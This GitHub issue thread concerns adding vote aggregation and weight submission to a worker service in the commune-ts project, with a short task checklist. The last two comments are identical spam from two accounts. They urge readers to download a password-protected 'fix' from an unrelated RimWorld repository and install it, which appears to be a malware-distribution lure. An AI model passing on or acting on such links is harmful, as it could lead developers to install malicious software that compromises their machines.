### ISSUE TITLE
Community Validator output on worker 

### ISSUE THREAD

**Issue by steinerkelvin** [renlabs-dev/commune-ts#143]
We need to add to the long-lived worker service:

- Gets user votes from DB, calculates final weights and sends to blockchain
- Make available vote data to frontend

**Comment by steinerkelvin** [comment]
- [ ] asserts on final weight function test
- [ ] query user stakes from blockchain
- [ ] query modules user votes/weights from DB
- [ ] think about how to serve back to frontend

**Comment by louseee** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by telfaw** [comment]
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
